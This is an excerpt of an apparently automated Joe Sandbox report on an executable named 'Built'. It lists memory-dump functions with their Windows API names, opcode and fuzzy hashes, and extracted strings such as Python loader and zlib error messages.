                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                              • Instruction ID: 3abae8f2dcad9af8ec1292d50d522cb38583912be5a295fadbc7109897234849
                                                              • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                              • Instruction Fuzzy Hash: E1D09224F18787A3EF183B706C9A27812517F48B41F142538D80B9A393ED2EA859AB13
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                              • Instruction ID: 99fa2097cb86ae68a8387e59ae44a807796e822b2923f7a129008aa34f269cf6
                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                              • Instruction Fuzzy Hash: 2151D671A096D286EE249A659C0277A7291BF84BA4F144734DD6C877C7CF3ED401AF03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                              • Instruction ID: aa83118576ff7483c60f9ce2848cdab35300d89d2794ca886ea1c8054ce5c15b
                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                              • Instruction Fuzzy Hash: B9112361708A8281DF208B25BC041696362BB81BF0F540335EE7D8BBEACF3DD0119B03
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                              • GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                              • Instruction ID: 822bb9ffbdabdf6e7b509b442c86d2c31bd36f5bb3d1eb928ac2316602c99e37
                                                              • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                              • Instruction Fuzzy Hash: 0DE04610F1820382FF08ABB2AC5613812607F88B40F040034D81DE22A2EE2F6899AB03
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC36
                                                              • GetLastError.KERNEL32(?,?,?,00007FF62665AA45,?,?,00000000,00007FF62665AAFA), ref: 00007FF62665AC40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast
                                                              • String ID:
                                                              • API String ID: 918212764-0
                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                              • Instruction ID: b211dc0fbf423a356ea9c4b272d5ebd346eedddadc35f718031d43862950b4f7
                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                              • Instruction Fuzzy Hash: CA218411B1C64342EF945761AC9627D1682BF84790F084239D91EC77D3CE6FA449AB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                              • Instruction ID: 7e2b80a5280c0e60023e0bdf626db0267802b0880f429fa676defa7570039e0a
                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                              • Instruction Fuzzy Hash: A041E57290820287EE34DB15E95227973A5FB95B84F100135DA8EC7692CF2FE442DF93
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              • Opcode ID: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
                                                              • Instruction ID: fabc97366a2ef45bee363c737e766f59de5ae79455965b615c215ab08a572023
                                                              • Opcode Fuzzy Hash: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
                                                              • Instruction Fuzzy Hash: 9721D321B196D285FE20AA126D153BAA651BF45FC4F8C4434EE4D87786CEBEE041EB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                              • Instruction ID: 2bf0ff5176d4ec4f0db51885bd11526d9dfb6d2915a44a865c1ee82f8342a4e4
                                                              • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                              • Instruction Fuzzy Hash: B731BC71A1864386EB505B699C5237C2650BF80B94F420135E92D937D3CF7EA841AF23
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                              • String ID:
                                                              • API String ID: 3947729631-0
                                                              • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                              • Instruction ID: fc516364c0378af873730cb191420e1d898226891a988f9423845cf8dc19f2d6
                                                              • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                              • Instruction Fuzzy Hash: 7C217C32E047828AEF258F64C8463EC37A0FB04718F480636D66D86AD6DF39D584DF52
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction ID: 2c4e2b31da8693a1c6bd18d1e148f76c901f399f5fa8e74a3c6186818cfd95c5
                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                              • Instruction Fuzzy Hash: FC113322A1C64282EE609F51AC0617EA264BFC5B84F554031EB4CD7A97DF3FE540AF03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                              • Instruction ID: 3d8171733539e834dccf6e7ebd3eec6aa2586efd80bdd260be4ee267cc2bfb07
                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                              • Instruction Fuzzy Hash: EC219572618A8286DF618F18F88137976A0FB84B94F244234E69DC76D5DF3ED8009F03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction ID: b72a2586c355e1571f14289c0352343f8043bef44ffe24a25b0d99a6c6feba17
                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                              • Instruction Fuzzy Hash: C101C421A0878281EE04DF529D02169B691BF95FE0F184631EE5C97BD7CE3EE0116B03
                                                              APIs
                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF62665B39A,?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA), ref: 00007FF62665EC5D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap
                                                              • String ID:
                                                              • API String ID: 4292702814-0
                                                              • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                              • Instruction ID: b8d2daae034e60b0ed2670bd211881836da5a23a921b5b13e5b1356234703c3f
                                                              • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                              • Instruction Fuzzy Hash: 8FF06D40F0920781FE545AA69CA33B516907F89B80F5C5530C91EDA3D3EF1EE480AB53
                                                              APIs
                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF626650D00,?,?,?,00007FF62665236A,?,?,?,?,?,00007FF626653B59), ref: 00007FF62665D6AA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap
                                                              • String ID:
                                                              • API String ID: 4292702814-0
                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                              • Instruction ID: 9cf904d9af9fda3d3e472da0eb2d2e5a5741f22c8af222092ad4e0c6ce2fb6e9
                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                              • Instruction Fuzzy Hash: 6EF0FE10B0934785FE5467729D5267922907F957A0F080730ED2ED57D3DE2EA441AF17
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645830
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645842
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645879
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664588B
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458A4
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458B6
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458CF
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458E1
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458FD
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664590F
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664592B
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664593D
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645959
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664596B
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645987
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645999
                                                              • GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459B5
                                                              • GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorLastProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 199729137-653951865
                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                              • Instruction ID: a3537bc7702626fedf611ebc0086da936d06d572064df9dc0e86523033db434b
                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                              • Instruction Fuzzy Hash: 1822C124A0EF47E2FE249B65BD241B427A5BF45785F445036C82E82260FF7EB158BB43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 808467561-2761157908
                                                              • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                              • Instruction ID: 7b60058297264045d02e951dcfef32ccd0fed4915d87c95fb132ac9cc0fafedf
                                                              • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                              • Instruction Fuzzy Hash: 14B2E572A182938BEB648E64E9417FD37A1FB54388F505135DA0D97E88DF3EA900DF42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                              • API String ID: 0-2665694366
                                                              • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                              • Instruction ID: 3a3b5baf203383577ecb38370af0614d831d4d124766a4c08948c663af424bfe
                                                              • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                              • Instruction Fuzzy Hash: 3652F676A146A687DBA48F14C868BBE3BA9FB44340F014139E64AC7784DF7ED840DF42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
